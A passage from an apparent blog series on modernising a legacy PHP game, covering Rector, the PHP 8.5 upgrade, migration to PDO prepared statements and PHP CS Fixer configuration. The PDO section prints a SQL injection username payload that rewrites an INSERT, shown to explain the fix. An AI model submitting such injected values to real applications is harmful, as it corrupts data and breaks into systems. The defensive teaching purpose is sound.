$value = $value + 5; assignments to $value += 5;"{$value}" to sprintf('%s', $value) or ''.$valueFinally, there are some rules that are not part of any rule set, which we have added one by one.
My advice to select only the rule set and rules you like, by first trying them all.
You can run Rector in "check only" mode for that purpose:
./vendor/bin/rector process --dry-run
Rector is a powerful tool that goes way beyond simple one-off upgrades.
By integrating it into your CI workflow, you can enforce Code Quality rules that continuously improve your codebase as it evolves.
The key difference with PHP CS Fixer is that Rector understands your code's structure and types through AST parsing, which means it can make safe refactoring decisions that a token-based tool simply cannot.
For BisouLand, we've seen Rector automatically:
And as the codebase improves (more type hints, better structure), Rector becomes even more effective at applying additional rules automatically.
My recommendation is to start with the rule sets that make sense for your project,
run them in --dry-run mode to review the changes,
and gradually build up your configuration by cherry-picking the rules you like.
Then keep Rector running in your CI to prevent regressions and maintain the code quality improvements you've worked so hard to achieve.
Now with our almost not spaghetti code, we truly are in the future.
]]>⁉️ What do you mean, "still using old MySQL database"?
🤘 The Migration Warlord breaks the rusted shackles of PHP 5.6, leading the great exodus through the valleys of breaking changes, into the promised land of PHP 8.5 where type hints and constructor property promotion await in glory! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:43000/), and have some level of automated tests.
But it's still stuck in the past with PHP 5.6, so let's upgrade it to PHP 8.5!
With the migration from the deprecated MySQL extension to PDO, BisouLand's codebase is technically compatible with the latest PHP version.
At least that's what Claude tells me.
If that's true, then upgrading it is as simple as modifying the monolith's Dockerfile:
- # Uses PHP 5.6 with PDO MySQL driver
+ # Uses PHP 8.5 with PDO MySQL driver
- FROM php:5.6-apache
-
- # Update sources.list to use archive repositories for Debian Stretch
- RUN sed -i 's/deb.debian.org/archive.debian.org/g' /etc/apt/sources.list \
- && sed -i 's/security.debian.org/archive.debian.org/g' /etc/apt/sources.list \
- && sed -i '/stretch-updates/d' /etc/apt/sources.list
+ FROM php:8.5-apache
We can now build the new image:
cd apps/monolith
make app-init # docker down, docker build, docker up
And that's it, welcome to the future!
Your eXtreme Legacy application might not be as lucky as BisouLand, and might require more work for an upgrade.
One way to do so is to use Rector, an automated refactoring tool that uses the power of AST to make sure the changes it makes are safe (i.e. non breaking) to do. Let's install it:
cd apps/qa
make composer arg='require --dev rector/rector'
We then need to configure it by creating the rector.php file:
<?php
declare(strict_types=1);
use Rector\Caching\ValueObject\Storage\FileCacheStorage;
use Rector\Config\RectorConfig;
use Rector\Set\ValueObject\SetList;
return RectorConfig::configure()
->withCache(
// CI compatible temporary paths for cach
cacheDirectory: '/tmp/rector',
cacheClass: FileCacheStorage::class,
)
->withPaths([
__DIR__,
__DIR__.'/../monolith',
])
->withSkip([
// —— Excluded paths ———————————————————————————————————————————————————
// [qa]
__DIR__.'/vendor',
// [monolith]
__DIR__.'/../monolith/vendor',
])
->withSets([
// —— PHP ——————————————————————————————————————————————————————————————
SetList::PHP_56,
]);
We can then run it as follow:
make rector # ./vendor/bin/rector
This initial run will ensure both the Monolith and QA apps are PHP 5.6 compliant, which they are so no changes done.
We can be bold and brave and change Rector's config straight from SetList::PHP_56
to SetList::PHP_84, which will then make all the necessary upgrades from PHP 5.6 to 8.5,
but incremental steps are safer so we'll start with PHP 7.0:
sed -i -e 's/PHP_56/PHP_70/g' ./rector.php
# 🍏 On Mac: sed -i '' -e 's/PHP_56/PHP_70/g' ./rector.php
Running it (make rector) will spot one change that needs to be done:
replace rand() with random_int():
// Si les bisous du défenseurs sont présent, donc qu'il n'attaque pas.
if (0 == $DefBloque) {
- $DefSmack = floor($DefSmack * (1 - 1 / rand(2, 10)));
- $DefBaiser = floor($DefBaiser * (1 - 1 / rand(2, 10)));
- $DefPelle = floor($DefPelle * (1 - 1 / rand(2, 10)));
+ $DefSmack = floor($DefSmack * (1 - 1 / random_int(2, 10)));
+ $DefBaiser = floor($DefBaiser * (1 - 1 / random_int(2, 10)));
+ $DefPelle = floor($DefPelle * (1 - 1 / random_int(2, 10)));
}
Technically rand is still supported in PHP 8,
but it does not generate cryptographically secure digits,
so random_int is recommended instead.
Next step is to upgrade to PHP 7.1, which detects no changes, so we're safe to upgrade to PHP 7.2, which detects no changes, so we're safe to upgrade to PHP 7.3, which detects some changes!
The function setcookie can take an array of options as a third parameter
(and yes, we store the password in the cookie. This will need to be fixed later):
if (isset($_POST['auto'])) {
$timestamp_expire = time() + 30 * 24 * 3600;
- setcookie('pseudo', $pseudo, $timestamp_expire);
- setcookie('mdp', $mdp, $timestamp_expire);
+ setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
+ setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
}
Next step is to upgrade to PHP 7.4, which detects no changes, so we're safe to upgrade to PHP 8.0, which detects no changes, so we're safe to upgrade to PHP 8.1, which detects some changes!
This is an interesting one, as it enforces the type of variables for function
calls that expect for example a string but might receive null:
$pdo = bd_connect();
if (isset($_POST['action'])) {
$cout = 0;
- $nuageCible = htmlentities($_POST['nuage']);
- $positionCible = htmlentities($_POST['position']);
+ $nuageCible = htmlentities((string) $_POST['nuage']);
+ $positionCible = htmlentities((string) $_POST['position']);
Next step is to upgrade to PHP 8.1, which detects no changes, so we're safe to upgrade to PHP 8.2, which detects no changes, so we're safe to upgrade to PHP 8.3, which detects no changes, so we're safe to upgrade to PHP 8.4, which detects some changes!
This one is for the QA app, it removes the now unnecessary parenthesis around object instantiation:
- (new Dotenv())->load(__DIR__.'/../../../monolith/.env');
+ new Dotenv()->load(__DIR__.'/../../../monolith/.env');
And that's it.
With the latest version of PHP,
we can change or Coding Style in .php-cc-fixer.dist.php
to take into account new changes:
- // —— Disabed rules due to PHP version compatibility ———————————————————
-
- // [PER-CS2.0] Partially disabled due to PHP version constraints.
- 'trailing_comma_in_multiline' => [
- 'after_heredoc' => true,
- 'elements' => [
- // 'arguments', For PHP 7.3+
- // 'array_destructuring', For PHP 7.1+
- 'arrays',
- // 'match', For PHP 8.0+
- // 'parameters', For PHP 8.0+
- ],
- ],
+ // —— Overriden rules ——————————————————————————————————————————————————
+
+ // [Symfony] Adding `['elements']['parameters']` (Symfony doesn't have it)
+ 'trailing_comma_in_multiline' => [
+ 'after_heredoc' => true,
+ 'elements' => [
+ 'arguments',
+ 'array_destructuring',
+ 'arrays',
+ 'match',
+ 'parameters',
+ ],
+ ] ,
But that's not all. PHP CS Fixer also has rule set to help us migrate the style from old PHP versions to new ones, which we'll do incrementally.
First we enable the rule sets:
// —— CS Rule Sets —————————————————————————————————————————————————————
'@Symfony' => true,
'@Symfony:risky' => true,
+ '@PHP7x0Migration' => true,
+ '@PHP7x0Migration:risky' => true,
And we run it with make cs-fix. It's detected some changes:
replacing mt_rand which is also not cryptographically secure with random_int:
// On choisi une valeur au hasard.
- $FinalPos = $FreePos[mt_rand(0, $nbLibre - 1)];
+ $FinalPos = $FreePos[random_int(0, $nbLibre - 1)];
Next step we upgrade the rule set to PHP 7.1
sed -i -e 's/PHP7x0/PHP7x1/g' ./.php-cs-fixer.dist.php
# 🍏 On Mac: sed -i '' -e 's/PHP7x0/PHP7x1/g' ./php-cs-fixer.dist.php
Running it, we get void return type hints:
- function GiveNewPosition($idJoueur)
+ function GiveNewPosition($idJoueur): void
{
$pdo = bd_connect();
$sql_info = $pdo->query('SELECT nombre FROM nuage WHERE id=1');
Next step is to upgrade to PHP 7.2, which detects no changes, so we're safe to upgrade to PHP 7.3, which detects some changes!
This one is related to HEREDOC indentation.
I'm gonna be brief now, as after that, upgrading all the way to PHP 8.5, there were no changes.
With a modern version of PHP, not only do we get security patches, exciting new feature (typed code, constructor property promotion, readonly final classes, etc), as well as access to many modern tools and libraries (composer, Symfony components, etc), but we also get a boost in performance.
Let's back up that last claim by running some vanity benchmarks as follow:
# Start fresh
cd apps/monolith
make app-init
BENCH_USER="BisouTest_bench"
BENCH_PASS="SuperSecret123"
# Sign up
curl -X POST 'http://localhost:43000/inscription.html' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "Ipseudo=${BENCH_USER}&Imdp=${BENCH_PASS}&Imdp2=${BENCH_PASS}&inscription=S%27inscrire"
# Log in
BENCH_COOKIE=$(curl -X POST 'http://localhost:43000/redirect.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "pseudo=${BENCH_USER}&mdp=${BENCH_PASS}&connexion=Se+connecter" \
-i -s | grep -i 'set-cookie: PHPSESSID' | sed 's/.*PHPSESSID=\([^;]*\).*/\1/' | tr -d '\r')
# Test load homepage (not signed in)
ab -l -q -k -c 50 -n 10000 http://localhost:43000/ \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
# Test load Brain page (signed in)
ab -l -q -k -c 50 -n 10000 -C "PHPSESSID=$BENCH_COOKIE" http://localhost:43000/cerveau.html \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
On my MacBook M4 (with Docker), the results are as follow:
+8.9% improvement
545.67 to 594.491.833 to 1.682+30.2% improvement
313.88 to 408.783.186 to 2.446Surely with such almighty gains we won't need to rewrite BisouLand in go / rust.
]]>⁉️ What do you mean, "the code is still unrefactorable"?
🤘 The Parameter Paladin storms forth from the OWASP bastion, raising the impenetrable shield of Prepared Statements, against the shadow army of malicious injections, that seek to corrupt the sacred data temples! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:8080/), and have some level of automated tests.
But it's currently riddled with deprecated calls to mysql_query(),
so let's upgrade the codebase to PDO!
Before we start, a note on security vulnerabilities.
The BisouLand SQL queries are full of input values directly concatenated in the SQL queries, like here:
// SignUp form: inscription.php
$result = mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
."VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
This would clearly be a SQL injection risk, as someone could submit the following username:
Eisenberg', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 1759645024, 1759645024, '42000'); --
Which would create the user as expected, but with 42k Love Points instead of the expected 300:
INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)
VALUES ('Eisenberg', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 1759645024, 1759645024, '42000');
-- ', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 1759645024, 1759645024, '300')
However looking a bit closer at the code, we can see that most of the time the user input is validated and sanitised, for example in the sign-up form the username:
addslashes() escapes ', ", \ and NULL byteshtmlentities() escapes HTML characters like <, >, 'Which effectively prevents SQL Injection:
// SignUp form: inscription.php
$pseudo = htmlentities(addslashes($_POST['Ipseudo']));
$mdp = htmlentities(addslashes($_POST['Imdp']));
$taille = strlen(trim($_POST['Ipseudo']));
if ($taille >= 4 && $taille <= 15) {
// ...
$result = mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
." VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
}
Regardless, using PDO with prepared statements will make sure we don't accidentally introduce SQL vulnerabilities.
The first thing we're going to do is update the apps/monolith/Dockerfile,
as we'll now need the PDO extension and its MySQL companion,
instead of the MySQL solo extension:
# ...
# Install system dependencies and PHP extensions in single layer
RUN docker-php-ext-install pdo pdo_mysql \
&& a2enmod rewrite
# ...
This change will require us to update the container:
# in apps/monolith
make down
make build
make up
Then we have to take care of the mysql_pconnect,
located in apps/monolith/phpincludes/bd.php:
<?php
include __DIR__.'/../config/parameters.php';
function bd_connect()
{
mysql_pconnect(
DATABASE_HOST.':'.DATABASE_PORT,
DATABASE_USER,
DATABASE_PASSWORD
);
mysql_select_db(DATABASE_NAME);
}
This creates a persistent connection, for the current HTTP request.
We're going to replace it with PDO (PHP Data Object, what a weird name), the out of the box Database Abstraction Layer:
<?php
include __DIR__.'/../config/parameters.php';
function bd_connect()
{
static $pdo = null;
if (null === $pdo) {
$dsn = 'mysql:host='.DATABASE_HOST.';port='.DATABASE_PORT.';dbname='.DATABASE_NAME.';charset=utf8mb4';
$options = [
// Throw exceptions on error
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
// Return query results as associative arrays (column name => value)
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
// Use prepared statements at the database layer, for better security and performance
PDO::ATTR_EMULATE_PREPARES => false,
];
$pdo = new PDO($dsn, DATABASE_USER, DATABASE_PASSWORD, $options);
}
return $pdo;
}
We then need to change the usage of the function in the codebase:
bd_connect() to $pdo = bd_connect()The bd_connect has been transformed into a Singleton,
it will always return the same instance of PDO (for the duration of the HTTP Request).
I'd normally frown at this but this is a temporary measure:
my intention is to later in the series introduce a Dependency Injection Container,
and instead of having those $pdo = bd_connect() statements,
we'll have $pdo = $container->get(PDO::class);.
It's then a game of finding and replacing all mysql_* functions:
mysql_query() to $pdo->prepare(); $pdo->execute() or $pdo->query()mysql_fetch_assoc() to $pdo->fetch()mysql_result() to $pdo->fetchColumn()mysql_num_rows() to $pdo->rowCount() or $pdo->fetchColumn()mysql_insert_id() to $pdo->lastInsertId()For example in apps/monolith/web/phpincludes/inscription.php:
$result = mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
."VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
if (false === $result) {
echo 'Error: '.mysql_error();
}
$id = mysql_insert_id();
Becomes:
$stmt = $pdo->prepare(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
.' VALUES (:pseudo, :mdp, :confirmation, :timestamp, :lastconnect, :amour)'
);
$stmt->execute([
'pseudo' => $pseudo,
'mdp' => $hmdp,
'confirmation' => 1,
'timestamp' => time(),
'lastconnect' => time(),
'amour' => 300,
]);
$id = $pdo->lastInsertId();
There were 25 PHP files with ~250+ of such calls, by the way.
And before we forget,
with prepared statements we no longer need calls to addslashes(),
so we can also removed them.
We shouldn't stop there. There's an issue we've encountered in a previous article,
where the code was using '' for the id column in INSERT statements.
This was relying on string to integer conversion, which MySQL supported until version 5.7.
After a quick look, I've found 5 more instances of these, which I've now fixed.
And last but not least, still on the topic of string to integer conversion, there are other integer fields that are receiving strings:
web/phpincludes/inscription.php:
'1' is used for the confirmation field, should be 1 (TINYINT field)'300' is used for the amour field, should be 300 (INT field)web/phpincludes/lire.php: '1' is used for status (INT field)web/phpincludes/attaque.php: '0' is used for finaller (INT field)web/news/liste_news.php: '0' is used for timestamp_modification (INT field)web/phpincludes/cerveau.php: '1' is used for confirmation (TINYINT field)web/phpincludes/membres.php: '1' is used for confirmation (TINYINT field)This has been a lot of effort, and there's seemingly not a lot to show for it.
But by switching from the MySQL extension to PDO, we've unlocked something amazing: we will be able to upgrade to the latest version of PHP, which will provide a big performance boost as well as many security patches.
And we will be able to switch to PostgreSQL!
]]>⁉️ What do you mean, "PHP is slow and we should use go / rust"?
🤘 The Coding Standards Inquisitor rises from the sulphurous pits of Legacy Chaos, brandishing the iron scriptures of Style Guides, purging the realm of inconsistent formatting with flames of automated linting! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:8080/), and have some level of automated tests.
But the code is ugly!
So we're going to establish beautiful Coding Standards, which will be today's fourth article focus, and enforce them automatically using PHP CS Fixer.
We will not start with the highest quality standard, as this would make it too difficult to track the changes.
Instead we'll:
Ideally, teams should discuss and agree on a select list of rules to follow, but the list of possible rules is too overwhelming.
So instead of picking rules one by one, we can rely on rule sets.
My humble opinion is that the Symfony CS are the best, but that'd be too many rules to add in one go.
If we check the Symfony rule set doc, at the top we can see @PER-CS3x0.
Rules that start with @ are actually rulesets,
so Symfony depends on other smaller rulesets,
and those smaller rulesets also depend on other smaller rulesets.
It's a tedious task, but we can navigate the documentation website, construct the tree of rule sets used, and then start with the smaller one:
For each rule set, we then check if anything is breaking, and if so we exclude the specific rule.
Let's start with an empty configuration in apps/qa/.php-cs-fixer.php.dist:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Running it will not report any problems:
> make cs-check // equivalent to: ./vendor/bin/php-cs-fixer check --verbose
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
Found 0 of 43 files that can be fixed in 0.105 seconds, 18.00 MB memory used
Let's add the PSR-1 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
'@PSR1' => true,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
This will make sure we use:
<? but <?php)Let's run the checks:
> make cs-check
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/news/chemin.php (full_opening_tag)
Found 1 of 43 files that can be fixed in 0.103 seconds, 18.00 MB memory used
There's one file that uses <?, to automatically fix it we run:
> make cs-fix // equivalent to: ./vendor/bin/php-cs-fixer fix --verbose
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/news/chemin.php (full_opening_tag)
Fixed 1 of 43 files in 0.107 seconds, 18.00 MB memory used
And that's PSR-1 done and dusted.
Time for the PSR-2 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
'@PSR2' => true,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
It adds about 30 new rules, mainly regarding brace placement and indentation formatting.
Let's run a check:
> make cs-check
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (no_closing_tag, no_trailing_whitespace, single_blank_line_at_eof)
2) ../monolith/web/redirect.php (indentation_type, single_space_around_construct, method_argument_space, no_closing_tag, braces_position, statement_indentation, single_blank_line_at_eof)
3) ../monolith/web/checkConnect.php (indentation_type, elseif, single_space_around_construct, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation,single_blank_line_at_eof)
4) ../monolith/web/phpincludes/fctIndex.php (indentation_type, single_space_around_construct, method_argument_space, spaces_inside_parentheses, control_structure_braces, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation, single_blank_line_at_eof)
5) ../monolith/web/phpincludes/topten.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position, statement_indentation)
6) ../monolith/web/phpincludes/pages.php (indentation_type, no_closing_tag, statement_indentation, single_blank_line_at_eof)
7) ../monolith/web/config/parameters.php (single_blank_line_at_eof)
8) ../monolith/web/deconnexion.php (indentation_type, single_space_around_construct, no_closing_tag, braces_position, single_blank_line_at_eof)
9) ../monolith/web/news/rediger_news.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position, statement_indentation)
10) ../monolith/web/news/chemin.php (no_closing_tag, single_blank_line_at_eof)
11) ../monolith/web/news/liste_news.php (indentation_type, single_space_around_construct, lowercase_keywords, braces_position, statement_indentation)
12) ../monolith/web/phpincludes/evo.php (indentation_type, single_space_around_construct, method_argument_space, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation, single_blank_line_at_eof)
13) ../monolith/web/phpincludes/stats.php (indentation_type, method_argument_space, statement_indentation)
14) ../monolith/web/phpincludes/infos.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
15) ../monolith/web/phpincludes/yeux.php (indentation_type, single_space_around_construct, method_argument_space, no_trailing_whitespace, braces_position, statement_indentation)
16) ../monolith/web/phpincludes/inscription.php (indentation_type, single_space_around_construct, method_argument_space, spaces_inside_parentheses, braces_position, statement_indentation)
17) ../monolith/web/phpincludes/faq.php (indentation_type, braces_position, statement_indentation)
18) ../monolith/web/phpincludes/construction.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, braces_position, statement_indentation)
19) ../monolith/web/phpincludes/recherche.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position)
20) ../monolith/web/phpincludes/bd.php (braces_position, statement_indentation)
21) ../monolith/web/phpincludes/accueil.php (indentation_type, no_trailing_whitespace, braces_position, statement_indentation)
22) ../monolith/web/phpincludes/lire.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
23) ../monolith/web/phpincludes/membres.php (indentation_type, single_space_around_construct, method_argument_space, no_trailing_whitespace, braces_position, statement_indentation)
24) ../monolith/web/phpincludes/nuage.php (indentation_type, single_space_around_construct, method_argument_space, no_trailing_whitespace, braces_position, statement_indentation)
25) ../monolith/web/phpincludes/attaque.php (indentation_type, single_space_around_construct, method_argument_space, no_closing_tag, no_trailing_whitespace, no_trailing_whitespace_in_comment, no_multiple_statements_per_line, braces_position, statement_indentation, single_blank_line_at_eof)
26) ../monolith/web/phpincludes/confirmation.php (indentation_type, single_space_around_construct, method_argument_space, spaces_inside_parentheses, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation, single_blank_line_at_eof)
27) ../monolith/web/phpincludes/changepass.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, spaces_inside_parenthes, no_trailing_whitespace, braces_position, statement_indentation)
28) ../monolith/web/phpincludes/techno.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, braces_position, statement_indentation)
29) ../monolith/web/phpincludes/newpass.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, spaces_inside_parentheses,no_trailing_whitespace, braces_position, statement_indentation)
30) ../monolith/web/makeBan.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, spaces_inside_parentheses, no_closing_tag, braces_position, statement_indentation, single_blank_line_at_eof)
31) ../monolith/web/index.php (indentation_type, single_space_around_construct, method_argument_space, control_structure_braces, no_trailing_whitespace, no_trailing_whitespace_in_comment, braces_position, statement_indentation)
32) ../monolith/web/phpincludes/livreor.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position, statement_indentation)
33) ../monolith/web/phpincludes/connexion.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
34) ../monolith/web/phpincludes/boite.php (indentation_type, single_space_around_construct, method_argument_space, control_structure_braces, lowercase_keywords, no_trailing_whitespace, braces_position, statement_indentation)
35) ../monolith/web/phpincludes/connected.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
36) ../monolith/web/phpincludes/envoi.php (indentation_type, single_space_around_construct, method_argument_space, braces_position, statement_indentation)
37) ../monolith/web/phpincludes/action.php (indentation_type, single_space_around_construct, method_argument_space, braces_position, statement_indentation)
Found 37 of 43 files that can be fixed in 0.207 seconds, 18.00 MB memory used
Files that were not fixed due to errors reported during linting after fixing:
1) /apps/qa/../monolith/web/phpincludes/cerveau.php
2) /apps/qa/../monolith/web/phpincludes/bisous.php
We have lots of changes, but what I'd like to focus more on is the two errors at the end.
To find out what specific rules are concerned,
we can replaced PSR2 with all the individual rules it includes:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// '@PSR2' => true,
'@PSR1' => true,
'blank_line_after_namespace' => true,
'braces_position' => true,
'class_definition' => true,
'constant_case' => true,
'control_structure_braces' => true,
'control_structure_continuation_position' => true,
'elseif' => true,
'function_declaration' => ['closure_fn_spacing' => 'one'],
'indentation_type' => true,
'line_ending' => true,
'lowercase_keywords' => true,
'method_argument_space' => ['after_heredoc' => false, 'attribute_placement' => 'ignore', 'on_multiline' => 'ensure_fully_multiline'],
'modifier_keywords' ['elements' => ['method', 'property']],
'no_break_comment' => true,
'no_closing_tag' => true,
'no_multiple_statements_per_line' => true,
'no_space_around_double_colon' => true,
'no_spaces_after_function_name' => true,
'no_trailing_whitespace' => true,
'no_trailing_whitespace_in_comment' => true,
'single_blank_line_at_eof' => true,
'single_class_element_per_statement' => ['elements' => ['property']],
'single_import_per_statement' => true,
'single_line_after_imports' => true,
'single_space_around_construct' => ['constructs_followed_by_a_single_space' => ['abstract', 'as', 'case', 'catch', 'class', 'do', 'else', 'elseif', 'final', 'for', 'foreach', 'function', 'if', 'interface', 'namespace', 'private', 'protected', 'public', 'static', 'switch', 'trait', 'try', 'use_lambda', 'while'], 'constructs_preceded_by_a_single_space' => ['as', 'else', 'elseif', 'use_lambda']],
'spaces_inside_parentheses' => true,
'statement_indentation' => true,
'switch_case_semicolon_to_colon' => true,
'switch_case_space' => true,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Then we eliminate one rule, run the check, and see if the error is still there, then eliminate the next rule, etc.
Doing so, I've identified the following rule as being the offender:
Looking at apps/monolith/web/phpincludes/cerveau.php,
we can see a mix of HTML and PHP (the following is a condensed example):
<h1>Cerveau</h1>
<?php
if ($_SESSION['logged'] == true)
{
$production = calculerGenAmour(0,3600,$nbE[0][0],$nbE[1][0],$nbE[1][1],$nbE[1][2]);
?>
Score : <strong><?php echo formaterNombre($score); ?></strong> Point<?php echo pluriel($score);?><br />
<?php
if ($donnees_info = mysql_fetch_assoc($sql_info))
{
$pseudoCible = $donnees_info2['pseudo'];
?>
Tu vas tenter d'embrasser <strong><?php echo $pseudoCible; ?></strong>
<?php
}
}
?>
This is a known issue,
and currently PHP CS Fixer doesn't support these kind of files,
so all we can do is restore PSR2 and then disable that one specific rule:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PSR2' => true,
// —— Overriden rules ——————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Now we can fix the files running make cs-fix.
Let's now upgrade to PSR-12 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PSR12' => true,
// —— Overriden rules ——————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
PSR-12 extends PSR-2 with rules for modern PHP syntax, specifically how to format newer language features like:
As well as other PHP 7+ constructs that didn't exist when PSR-2 was written (in 2012, when PHP 5.4 got released).
Let's run the checks:
> make cs-check
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (binary_operator_spaces)
2) ../monolith/web/redirect.php (blank_line_after_opening_tag, binary_operator_spaces, no_whitespace_in_blank_line)
